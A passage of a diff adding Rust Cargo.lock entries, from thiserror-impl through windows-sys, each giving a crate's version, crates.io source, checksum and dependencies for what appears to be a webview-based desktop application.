+version = "1.0.69"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4fee6c4efc90059e10f81e6d42c60a18f76588c3d74cb83a0b242a2b6c7504c1"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "thiserror-impl"
+version = "2.0.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ebc4ee7f67670e9b64d05fa4253e753e016c6c95ff35b89b7941d6b856dec1d5"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "time"
+version = "0.3.47"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "743bd48c283afc0388f9b8827b976905fb217ad9e647fae3a379a9283c4def2c"
+dependencies = [
+ "deranged",
+ "itoa",
+ "num-conv",
+ "powerfmt",
+ "serde_core",
+ "time-core",
+ "time-macros",
+]
+
+[[package]]
+name = "time-core"
+version = "0.1.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7694e1cfe791f8d31026952abf09c69ca6f6fa4e1a1229e18988f06a04a12dca"
+
+[[package]]
+name = "time-macros"
+version = "0.2.27"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2e70e4c5a0e0a8a4823ad65dfe1a6930e4f4d756dcd9dd7939022b5e8c501215"
+dependencies = [
+ "num-conv",
+ "time-core",
+]
+
+[[package]]
+name = "tinystr"
+version = "0.8.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c8323304221c2a851516f22236c5722a72eaa19749016521d6dff0824447d96d"
+dependencies = [
+ "displaydoc",
+ "zerovec",
+]
+
+[[package]]
+name = "tinyvec"
+version = "1.11.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3e61e67053d25a4e82c844e8424039d9745781b3fc4f32b8d55ed50f5f667ef3"
+dependencies = [
+ "tinyvec_macros",
+]
+
+[[package]]
+name = "tinyvec_macros"
+version = "0.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1f3ccbac311fea05f86f61904b462b55fb3df8837a366dfc601a0161d0532f20"
+
+[[package]]
+name = "tokio"
+version = "1.51.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f66bf9585cda4b724d3e78ab34b73fb2bbaba9011b9bfdf69dc836382ea13b8c"
+dependencies = [
+ "bytes",
+ "libc",
+ "mio",
+ "pin-project-lite",
+ "socket2",
+ "tokio-macros",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "tokio-macros"
+version = "2.7.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "385a6cb71ab9ab790c5fe8d67f1645e6c450a7ce006a33de03daa956cf70a496"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "tokio-rustls"
+version = "0.26.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1729aa945f29d91ba541258c8df89027d5792d85a8841fb65e8bf0f4ede4ef61"
+dependencies = [
+ "rustls",
+ "tokio",
+]
+
+[[package]]
+name = "tokio-util"
+version = "0.7.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9ae9cec805b01e8fc3fd2fe289f89149a9b66dd16786abd8b19cfa7b48cb0098"
+dependencies = [
+ "bytes",
+ "futures-core",
+ "futures-sink",
+ "pin-project-lite",
+ "tokio",
+]
+
+[[package]]
+name = "toml"
+version = "0.8.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "185d8ab0dfbb35cf1399a6344d8484209c088f75f8f68230da55d48d95d43e3d"
+dependencies = [
+ "serde",
+ "serde_spanned 0.6.9",
+ "toml_datetime 0.6.3",
+ "toml_edit 0.20.2",
+]
+
+[[package]]
+name = "toml"
+version = "0.9.12+spec-1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cf92845e79fc2e2def6a5d828f0801e29a2f8acc037becc5ab08595c7d5e9863"
+dependencies = [
+ "indexmap 2.14.0",
+ "serde_core",
+ "serde_spanned 1.1.1",
+ "toml_datetime 0.7.5+spec-1.1.0",
+ "toml_parser",
+ "toml_writer",
+ "winnow 0.7.15",
+]
+
+[[package]]
+name = "toml_datetime"
+version = "0.6.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7cda73e2f1397b1262d6dfdcef8aafae14d1de7748d66822d3bfeeb6d03e5e4b"
+dependencies = [
+ "serde",
+]
+
+[[package]]
+name = "toml_datetime"
+version = "0.7.5+spec-1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "92e1cfed4a3038bc5a127e35a2d360f145e1f4b971b551a2ba5fd7aedf7e1347"
+dependencies = [
+ "serde_core",
+]
+
+[[package]]
+name = "toml_datetime"
+version = "1.1.1+spec-1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3165f65f62e28e0115a00b2ebdd37eb6f3b641855f9d636d3cd4103767159ad7"
+dependencies = [
+ "serde_core",
+]
+
+[[package]]
+name = "toml_edit"
+version = "0.19.15"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1b5bb770da30e5cbfde35a2d7b9b8a2c4b8ef89548a7a6aeab5c9a576e3e7421"
+dependencies = [
+ "indexmap 2.14.0",
+ "toml_datetime 0.6.3",
+ "winnow 0.5.40",
+]
+
+[[package]]
+name = "toml_edit"
+version = "0.20.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "396e4d48bbb2b7554c944bde63101b5ae446cff6ec4a24227428f15eb72ef338"
+dependencies = [
+ "indexmap 2.14.0",
+ "serde",
+ "serde_spanned 0.6.9",
+ "toml_datetime 0.6.3",
+ "winnow 0.5.40",
+]
+
+[[package]]
+name = "toml_edit"
+version = "0.25.11+spec-1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0b59c4d22ed448339746c59b905d24568fcbb3ab65a500494f7b8c3e97739f2b"
+dependencies = [
+ "indexmap 2.14.0",
+ "toml_datetime 1.1.1+spec-1.1.0",
+ "toml_parser",
+ "winnow 1.0.1",
+]
+
+[[package]]
+name = "toml_parser"
+version = "1.1.2+spec-1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a2abe9b86193656635d2411dc43050282ca48aa31c2451210f4202550afb7526"
+dependencies = [
+ "winnow 1.0.1",
+]
+
+[[package]]
+name = "toml_writer"
+version = "1.1.1+spec-1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "756daf9b1013ebe47a8776667b466417e2d4c5679d441c26230efd9ef78692db"
+
+[[package]]
+name = "tower"
+version = "0.5.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ebe5ef63511595f1344e2d5cfa636d973292adc0eec1f0ad45fae9f0851ab1d4"
+dependencies = [
+ "futures-core",
+ "futures-util",
+ "pin-project-lite",
+ "sync_wrapper",
+ "tokio",
+ "tower-layer",
+ "tower-service",
+]
+
+[[package]]
+name = "tower-http"
+version = "0.6.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d4e6559d53cc268e5031cd8429d05415bc4cb4aefc4aa5d6cc35fbf5b924a1f8"
+dependencies = [
+ "async-compression",
+ "bitflags 2.11.1",
+ "bytes",
+ "futures-core",
+ "futures-util",
+ "http",
+ "http-body",
+ "http-body-util",
+ "iri-string",
+ "pin-project-lite",
+ "tokio",
+ "tokio-util",
+ "tower",
+ "tower-layer",
+ "tower-service",
+]
+
+[[package]]
+name = "tower-layer"
+version = "0.3.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "121c2a6cda46980bb0fcd1647ffaf6cd3fc79a013de288782836f6df9c48780e"
+
+[[package]]
+name = "tower-service"
+version = "0.3.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8df9b6e13f2d32c91b9bd719c00d1958837bc7dec474d94952798cc8e69eeec3"
+
+[[package]]
+name = "tracing"
+version = "0.1.44"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "63e71662fa4b2a2c3a26f570f037eb95bb1f85397f3cd8076caed2f026a6d100"
+dependencies = [
+ "pin-project-lite",
+ "tracing-attributes",
+ "tracing-core",
+]
+
+[[package]]
+name = "tracing-attributes"
+version = "0.1.31"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7490cfa5ec963746568740651ac6781f701c9c5ea257c58e057f3ba8cf69e8da"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "tracing-core"
+version = "0.1.36"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "db97caf9d906fbde555dd62fa95ddba9eecfd14cb388e4f491a66d74cd5fb79a"
+dependencies = [
+ "once_cell",
+]
+
+[[package]]
+name = "tray-icon"
+version = "0.21.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a5e85aa143ceb072062fc4d6356c1b520a51d636e7bc8e77ec94be3608e5e80c"
+dependencies = [
+ "crossbeam-channel",
+ "dirs",
+ "libappindicator",
+ "muda",
+ "objc2",
+ "objc2-app-kit",
+ "objc2-core-foundation",
+ "objc2-core-graphics",
+ "objc2-foundation",
+ "once_cell",
+ "png",
+ "serde",
+ "thiserror 2.0.18",
+ "windows-sys 0.60.2",
+]
+
+[[package]]
+name = "try-lock"
+version = "0.2.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
+
+[[package]]
+name = "typeid"
+version = "1.0.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bc7d623258602320d5c55d1bc22793b57daff0ec7efc270ea7d55ce1d5f5471c"
+
+[[package]]
+name = "typenum"
+version = "1.19.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "562d481066bde0658276a35467c4af00bdc6ee726305698a55b86e61d7ad82bb"
+
+[[package]]
+name = "uds_windows"
+version = "1.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f2f6fb2847f6742cd76af783a2a2c49e9375d0a111c7bef6f71cd9e738c72d6e"
+dependencies = [
+ "memoffset",
+ "tempfile",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "unic-char-property"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a8c57a407d9b6fa02b4795eb81c5b6652060a15a7903ea981f3d723e6c0be221"
+dependencies = [
+ "unic-char-range",
+]
+
+[[package]]
+name = "unic-char-range"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0398022d5f700414f6b899e10b8348231abf9173fa93144cbc1a43b9793c1fbc"
+
+[[package]]
+name = "unic-common"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "80d7ff825a6a654ee85a63e80f92f054f904f21e7d12da4e22f9834a4aaa35bc"
+
+[[package]]
+name = "unic-ucd-ident"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e230a37c0381caa9219d67cf063aa3a375ffed5bf541a452db16e744bdab6987"
+dependencies = [
+ "unic-char-property",
+ "unic-char-range",
+ "unic-ucd-version",
+]
+
+[[package]]
+name = "unic-ucd-version"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "96bd2f2237fe450fcd0a1d2f5f4e91711124f7857ba2e964247776ebeeb7b0c4"
+dependencies = [
+ "unic-common",
+]
+
+[[package]]
+name = "unicode-ident"
+version = "1.0.24"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e6e4313cd5fcd3dad5cafa179702e2b244f760991f45397d14d4ebf38247da75"
+
+[[package]]
+name = "unicode-segmentation"
+version = "1.13.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9629274872b2bfaf8d66f5f15725007f635594914870f65218920345aa11aa8c"
+
+[[package]]
+name = "unicode-xid"
+version = "0.2.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ebc1c04c71510c7f702b52b7c350734c9ff1295c464a03335b00bb84fc54f853"
+
+[[package]]
+name = "unsafe-libyaml"
+version = "0.2.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "673aac59facbab8a9007c7f6108d11f63b603f7cabff99fabf650fea5c32b861"
+
+[[package]]
+name = "untrusted"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8ecb6da28b8a351d773b68d5825ac39017e680750f980f3a1a85cd8dd28a47c1"
+
+[[package]]
+name = "url"
+version = "2.5.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ff67a8a4397373c3ef660812acab3268222035010ab8680ec4215f38ba3d0eed"
+dependencies = [
+ "form_urlencoded",
+ "idna",
+ "percent-encoding",
+ "serde",
+ "serde_derive",
+]
+
+[[package]]
+name = "urlencoding"
+version = "2.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "daf8dba3b7eb870caf1ddeed7bc9d2a049f3cfdfae7cb521b087cc33ae4c49da"
+
+[[package]]
+name = "urlpattern"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "70acd30e3aa1450bc2eece896ce2ad0d178e9c079493819301573dae3c37ba6d"
+dependencies = [
+ "regex",
+ "serde",
+ "unic-ucd-ident",
+ "url",
+]
+
+[[package]]
+name = "utf-8"
+version = "0.7.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09cc8ee72d2a9becf2f2febe0205bbed8fc6615b7cb429ad062dc7b7ddd036a9"
+
+[[package]]
+name = "utf8_iter"
+version = "1.0.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b6c140620e7ffbb22c2dee59cafe6084a59b5ffc27a8859a5f0d494b5d52b6be"
+
+[[package]]
+name = "uuid"
+version = "1.23.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5ac8b6f42ead25368cf5b098aeb3dc8a1a2c05a3eee8a9a1a68c640edbfc79d9"
+dependencies = [
+ "getrandom 0.4.2",
+ "js-sys",
+ "serde_core",
+ "wasm-bindgen",
+]
+
+[[package]]
+name = "version-compare"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "03c2856837ef78f57382f06b2b8563a2f512f7185d732608fd9176cb3b8edf0e"
+
+[[package]]
+name = "version_check"
+version = "0.9.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0b928f33d975fc6ad9f86c8f283853ad26bdd5b10b7f1542aa2fa15e2289105a"
+
+[[package]]
+name = "vswhom"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "be979b7f07507105799e854203b470ff7c78a1639e330a58f183b5fea574608b"
+dependencies = [
+ "libc",
+ "vswhom-sys",
+]
+
+[[package]]
+name = "vswhom-sys"
+version = "0.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fb067e4cbd1ff067d1df46c9194b5de0e98efd2810bbc95c5d5e5f25a3231150"
+dependencies = [
+ "cc",
+ "libc",
+]
+
+[[package]]
+name = "walkdir"
+version = "2.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b"
+dependencies = [
+ "same-file",
+ "winapi-util",
+]
+
+[[package]]
+name = "want"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bfa7760aed19e106de2c7c0b581b509f2f25d3dacaf737cb82ac61bc6d760b0e"
+dependencies = [
+ "try-lock",
+]
+
+[[package]]
+name = "wasi"
+version = "0.9.0+wasi-snapshot-preview1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519"
+
+[[package]]
+name = "wasi"
+version = "0.11.1+wasi-snapshot-preview1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ccf3ec651a847eb01de73ccad15eb7d99f80485de043efb2f370cd654f4ea44b"
+
+[[package]]
+name = "wasip2"
+version = "1.0.2+wasi-0.2.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9517f9239f02c069db75e65f174b3da828fe5f5b945c4dd26bd25d89c03ebcf5"
+dependencies = [
+ "wit-bindgen",
+]
+
+[[package]]
+name = "wasip3"
+version = "0.4.0+wasi-0.3.0-rc-2026-01-06"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5428f8bf88ea5ddc08faddef2ac4a67e390b88186c703ce6dbd955e1c145aca5"
+dependencies = [
+ "wit-bindgen",
+]
+
+[[package]]
+name = "wasm-bindgen"
+version = "0.2.118"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0bf938a0bacb0469e83c1e148908bd7d5a6010354cf4fb73279b7447422e3a89"
+dependencies = [
+ "cfg-if",
+ "once_cell",
+ "rustversion",
+ "wasm-bindgen-macro",
+ "wasm-bindgen-shared",
+]
+
+[[package]]
+name = "wasm-bindgen-futures"
+version = "0.4.68"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f371d383f2fb139252e0bfac3b81b265689bf45b6874af544ffa4c975ac1ebf8"
+dependencies = [
+ "js-sys",
+ "wasm-bindgen",
+]
+
+[[package]]
+name = "wasm-bindgen-macro"
+version = "0.2.118"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "eeff24f84126c0ec2db7a449f0c2ec963c6a49efe0698c4242929da037ca28ed"
+dependencies = [
+ "quote",
+ "wasm-bindgen-macro-support",
+]
+
+[[package]]
+name = "wasm-bindgen-macro-support"
+version = "0.2.118"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9d08065faf983b2b80a79fd87d8254c409281cf7de75fc4b773019824196c904"
+dependencies = [
+ "bumpalo",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "wasm-bindgen-shared",
+]
+
+[[package]]
+name = "wasm-bindgen-shared"
+version = "0.2.118"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5fd04d9e306f1907bd13c6361b5c6bfc7b3b3c095ed3f8a9246390f8dbdee129"
+dependencies = [
+ "unicode-ident",
+]
+
+[[package]]
+name = "wasm-encoder"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "990065f2fe63003fe337b932cfb5e3b80e0b4d0f5ff650e6985b1048f62c8319"
+dependencies = [
+ "leb128fmt",
+ "wasmparser",
+]
+
+[[package]]
+name = "wasm-metadata"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bb0e353e6a2fbdc176932bbaab493762eb1255a7900fe0fea1a2f96c296cc909"
+dependencies = [
+ "anyhow",
+ "indexmap 2.14.0",
+ "wasm-encoder",
+ "wasmparser",
+]
+
+[[package]]
+name = "wasm-streams"
+version = "0.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9d1ec4f6517c9e11ae630e200b2b65d193279042e28edd4a2cda233e46670bbb"
+dependencies = [
+ "futures-util",
+ "js-sys",
+ "wasm-bindgen",
+ "wasm-bindgen-futures",
+ "web-sys",
+]
+
+[[package]]
+name = "wasmparser"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "47b807c72e1bac69382b3a6fb3dbe8ea4c0ed87ff5629b8685ae6b9a611028fe"
+dependencies = [
+ "bitflags 2.11.1",
+ "hashbrown 0.15.5",
+ "indexmap 2.14.0",
+ "semver",
+]
+
+[[package]]
+name = "web-sys"
+version = "0.3.95"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4f2dfbb17949fa2088e5d39408c48368947b86f7834484e87b73de55bc14d97d"
+dependencies = [
+ "js-sys",
+ "wasm-bindgen",
+]
+
+[[package]]
+name = "web-time"
+version = "1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
+dependencies = [
+ "js-sys",
+ "wasm-bindgen",
+]
+
+[[package]]
+name = "web_atoms"
+version = "0.2.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "57a9779e9f04d2ac1ce317aee707aa2f6b773afba7b931222bff6983843b1576"
+dependencies = [
+ "phf 0.13.1",
+ "phf_codegen 0.13.1",
+ "string_cache 0.9.0",
+ "string_cache_codegen 0.6.1",
+]
+
+[[package]]
+name = "webkit2gtk"
+version = "2.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a1027150013530fb2eaf806408df88461ae4815a45c541c8975e61d6f2fc4793"
+dependencies = [
+ "bitflags 1.3.2",
+ "cairo-rs",
+ "gdk",
+ "gdk-sys",
+ "gio",
+ "gio-sys",
+ "glib",
+ "glib-sys",
+ "gobject-sys",
+ "gtk",
+ "gtk-sys",
+ "javascriptcore-rs",
+ "libc",
+ "once_cell",
+ "soup3",
+ "webkit2gtk-sys",
+]
+
+[[package]]
+name = "webkit2gtk-sys"
+version = "2.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "916a5f65c2ef0dfe12fff695960a2ec3d4565359fdbb2e9943c974e06c734ea5"
+dependencies = [
+ "bitflags 1.3.2",
+ "cairo-sys-rs",
+ "gdk-sys",
+ "gio-sys",
+ "glib-sys",
+ "gobject-sys",
+ "gtk-sys",
+ "javascriptcore-rs-sys",
+ "libc",
+ "pkg-config",
+ "soup3-sys",
+ "system-deps",
+]
+
+[[package]]
+name = "webpki-roots"
+version = "1.0.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "22cfaf3c063993ff62e73cb4311efde4db1efb31ab78a3e5c457939ad5cc0bed"
+dependencies = [
+ "rustls-pki-types",
+]
+
+[[package]]
+name = "webview2-com"
+version = "0.38.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7130243a7a5b33c54a444e54842e6a9e133de08b5ad7b5861cd8ed9a6a5bc96a"
+dependencies = [
+ "webview2-com-macros",
+ "webview2-com-sys",
+ "windows",
+ "windows-core 0.61.2",
+ "windows-implement",
+ "windows-interface",
+]
+
+[[package]]
+name = "webview2-com-macros"
+version = "0.8.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "67a921c1b6914c367b2b823cd4cde6f96beec77d30a939c8199bb377cf9b9b54"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "webview2-com-sys"
+version = "0.38.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "381336cfffd772377d291702245447a5251a2ffa5bad679c99e61bc48bacbf9c"
+dependencies = [
+ "thiserror 2.0.18",
+ "windows",
+ "windows-core 0.61.2",
+]
+
+[[package]]
+name = "widestring"
+version = "1.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "72069c3113ab32ab29e5584db3c6ec55d416895e60715417b5b883a357c3e471"
+
+[[package]]
+name = "winapi"
+version = "0.3.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419"
+dependencies = [
+ "winapi-i686-pc-windows-gnu",
+ "winapi-x86_64-pc-windows-gnu",
+]
+
+[[package]]
+name = "winapi-i686-pc-windows-gnu"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
+
+[[package]]
+name = "winapi-util"
+version = "0.1.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22"
+dependencies = [
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "winapi-x86_64-pc-windows-gnu"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
+
+[[package]]
+name = "window-vibrancy"
+version = "0.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d9bec5a31f3f9362f2258fd0e9c9dd61a9ca432e7306cc78c444258f0dce9a9c"
+dependencies = [
+ "objc2",
+ "objc2-app-kit",
+ "objc2-core-foundation",
+ "objc2-foundation",
+ "raw-window-handle",
+ "windows-sys 0.59.0",
+ "windows-version",
+]
+
+[[package]]
+name = "windows"
+version = "0.61.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9babd3a767a4c1aef6900409f85f5d53ce2544ccdfaa86dad48c91782c6d6893"
+dependencies = [
+ "windows-collections",
+ "windows-core 0.61.2",
+ "windows-future",
+ "windows-link 0.1.3",
+ "windows-numerics",
+]
+
+[[package]]
+name = "windows-collections"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3beeceb5e5cfd9eb1d76b381630e82c4241ccd0d27f1a39ed41b2760b255c5e8"
+dependencies = [
+ "windows-core 0.61.2",
+]
+
+[[package]]
+name = "windows-core"
+version = "0.61.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c0fdd3ddb90610c7638aa2b3a3ab2904fb9e5cdbecc643ddb3647212781c4ae3"
+dependencies = [
+ "windows-implement",
+ "windows-interface",
+ "windows-link 0.1.3",
+ "windows-result 0.3.4",
+ "windows-strings 0.4.2",
+]
+
+[[package]]
+name = "windows-core"
+version = "0.62.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb"
+dependencies = [
+ "windows-implement",
+ "windows-interface",
+ "windows-link 0.2.1",
+ "windows-result 0.4.1",
+ "windows-strings 0.5.1",
+]
+
+[[package]]
+name = "windows-future"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc6a41e98427b19fe4b73c550f060b59fa592d7d686537eebf9385621bfbad8e"
+dependencies = [
+ "windows-core 0.61.2",
+ "windows-link 0.1.3",
+ "windows-threading",
+]
+
+[[package]]
+name = "windows-implement"
+version = "0.60.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "windows-interface"
+version = "0.59.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "windows-link"
+version = "0.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5e6ad25900d524eaabdbbb96d20b4311e1e7ae1699af4fb28c17ae66c80d798a"
+
+[[package]]
+name = "windows-link"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5"
+
+[[package]]
+name = "windows-numerics"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9150af68066c4c5c07ddc0ce30421554771e528bde427614c61038bc2c92c2b1"
+dependencies = [
+ "windows-core 0.61.2",
+ "windows-link 0.1.3",
+]
+
+[[package]]
+name = "windows-registry"
+version = "0.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "02752bf7fbdcce7f2a27a742f798510f3e5ad88dbe84871e5168e2120c3d5720"
+dependencies = [
+ "windows-link 0.2.1",
+ "windows-result 0.4.1",
+ "windows-strings 0.5.1",
+]
+
+[[package]]
+name = "windows-result"
+version = "0.3.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "56f42bd332cc6c8eac5af113fc0c1fd6a8fd2aa08a0119358686e5160d0586c6"
+dependencies = [
+ "windows-link 0.1.3",
+]
+
+[[package]]
+name = "windows-result"
+version = "0.4.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5"
+dependencies = [
+ "windows-link 0.2.1",
+]
+
+[[package]]
+name = "windows-strings"
+version = "0.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "56e6c93f3a0c3b36176cb1327a4958a0353d5d166c2a35cb268ace15e91d3b57"
+dependencies = [
+ "windows-link 0.1.3",
+]
+
+[[package]]
+name = "windows-strings"
+version = "0.5.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091"
+dependencies = [
+ "windows-link 0.2.1",
+]
+
+[[package]]
+name = "windows-sys"
+version = "0.45.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75283be5efb2831d37ea142365f009c02ec203cd29a3ebecbc093d52315b66d0"
+dependencies = [
+ "windows-targets 0.42.2",
+]
+
+[[package]]
+name = "windows-sys"
+version = "0.52.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d"
+dependencies = [
+ "windows-targets 0.52.6",
+]
+
+[[package]]
+name = "windows-sys"
+version = "0.59.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
